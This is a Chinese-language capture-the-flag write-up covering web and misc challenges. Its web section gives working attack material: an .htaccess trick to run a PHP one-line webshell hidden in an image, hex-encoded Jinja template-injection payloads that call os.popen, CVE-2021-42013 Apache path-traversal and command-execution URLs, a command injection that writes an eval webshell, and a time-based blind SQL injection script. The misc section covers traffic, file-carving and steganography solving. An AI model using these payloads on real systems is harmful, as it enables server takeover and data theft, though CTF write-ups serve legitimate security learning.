文章目录
- WEB
- Give me your photo PLZ
- BabySSTI_Three
- Unsafe Apache
- So Baby RCE Again
- Final round
- MISC
- 最后的流量分析
- 奇怪的PDF 2
- 奇怪的文本
- Yesec no drumsticks 5
- qsdz's girlfriend 5
WEB
Give me your photo PLZ
可上传.htaccess
AddType application/x-httpd-php .jpg
然后上传一个附加了一句话木马的图片,然后访问即可当作php文件解析
BabySSTI_Three
之前用的是字符串逆序绕过,这里过滤了:,然后用十六进制绕过即可
def hex_payload(payload):
res_payload = ''
for i in payload:
i = "\\x" + hex(ord(i))[2:]
res_payload += i
print('[+]"{}" Convert to hex: "{}"'.format(payload,res_payload))
if __name__ == '__main__':
payload = "__class__"
hex_payload(payload)
{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]}}
{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()}}
{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('id').read()}}
{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f'][0]['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[117]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x70\x6f\x70\x65\x6e']('tail${IFS}/fl*').read()}}
有了命令执行之后还需要有点绕过即可读取到flag
Unsafe Apache
这个版本有一个在CVE-2021-41773/Apache2.4.49 HTTP Server 路径穿越漏洞 原漏洞修复不完整导致的CVE(CVE-2021-42013)
/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
可命令执行
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;ls -lha /
So Baby RCE Again
?cmd=ls -lha / > 1.txt
SUID提权:find / -perm -u=s -type f 2>/dev/null > ./1.txt
写入一句话木马
?cmd=echo '<?php @eval($_POST[7]); ?>' > mochu7.php
蚁剑连接,date -f读取
Final round
延时盲注
直接脚本跑
import requests
import time
myurl = 'http://f7a282ac-9041-48a6-b86a-5bbe042f7035.node4.buuoj.cn:81/comments.php'
myheaders = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
"Connection": "close", "Upgrade-Insecure-Requests": "1"}
content = ''
for pos in range(500):
min_num = 32
max_num = 126
mid_num = (min_num + max_num) // 2
while (min_num < max_num):
payload = 'name=if(ord(mid((select(group_concat(text))from(wfy.wfy_comments)),{},1))>{},sleep(0.2),100)'.format(pos, mid_num)
resp = requests.post(url=myurl, headers=myheaders, data=payload)
resp_time = resp.elapsed.total_seconds()
if resp_time > 2:
min_num = mid_num + 1
else:
max_num = mid_num
mid_num = ((min_num + max_num) // 2)
content += chr(min_num)
print(content)
延时盲注时间太长,不建议重0开始跑,可以根据之前的几周的这道题的flag具体在哪个位置开始跑,缩短时间
MISC
最后的流量分析
简单的盲注流量分析
当响应包的长度>765时,该条查询语句正确,tshark导出查询语句和查询正确的判断条件(包长度)
tshark -r sqli.pcap -T fields -Y "http.request.method==GET or frame.len>765" -e "frame.len" -e "http.request.uri.query.parameter" > data.txt
Python简单处理
from urllib.parse import *
import re
comment = ''
with open('data.txt') as f:
lines = f.readlines()
for i in range(len(lines)):
if int(lines[i][:3])>765:
comment += re.findall(r'"(.)"', unquote(lines[i-1]))[0]
print(comment)
PS C:\Users\Administrator\Downloads> python .\code.py
flag{c84bb04a-8663-4ee2-9449-349f1ee83e11}
奇怪的PDF 2
strange2.pdf.lnk发现大量Base64
Python脚本简单提取
with open('strange2.pdf.lnk', 'rb') as f:
f.seek(0x8d8)
with open('data.txt', 'wb') as f1:
f1.write(f.read(0x160424-0x8d8))
提取之后发现有两行Base64,尝试解码了头部一段发现是.cab文件,且第一行的得到的.cab文件有点问题打不开,第二行的解码得到可以正常打开
from base64 import *
with open('data.txt') as f:
lines = f.readlines()
with open('2.cab', 'wb') as f1:
f1.write(b64decode(lines[1]+'=='))
选择一个文件夹提取出来即可,得到flag
flag{It_1s_a_fak3_but_r3al_PDF}
奇怪的文本
task.txt猜测字频
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()\_+-/={}[] "#所有正常打印字符
strings = open('./task.txt').read()#读取需要统计频数的文本
result = {}
for i in alphabet:
counts = strings.count(i)
i = '{0}'.format(i)
result[i] = counts
res = sorted(result.items(), key=lambda item: item[1], reverse=True)
num = 0
for data in res:
num += 1
print('频数第{0}: {1}'.format(num, data))
print('\n---------------以下是频数从多到少的字符,按照从前到后排序---------------')
for i in res:
flag = str(i[0])
print(flag[0], end="")
---------------以下是频数从多到少的字符,按照从前到后排序---------------
flag{S0B48yCA}tipk91v[_bcdehjmnoqrsuwxzDEFGHIJKLMNOPQRTUVWXYZ23567!@#$%^&*()\+-/=]
Yesec no drumsticks 5
PS C:\Users\Administrator\Downloads\Yesec_no_drumsticks_5> git stash pop
On branch master
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: flag.txt
no changes added to commit (use "git add" and/or "git commit -a")
Dropped refs/stash@{0} (5d4b28bdf154e648d74e3836dd838beb77cec898)
PS C:\Users\Administrator\Downloads\Yesec_no_drumsticks_5> cat .\flag.txt
flag{Yesec#1s#c@ibi}
qsdz’s girlfriend 5
使用Winrar解压,然后使用NTFStreamsEditor
得到密码,解压
Can_you_crack_steghide?
得到second_gf.jpg,根据密码提示进行爆破,这里利用stegseek
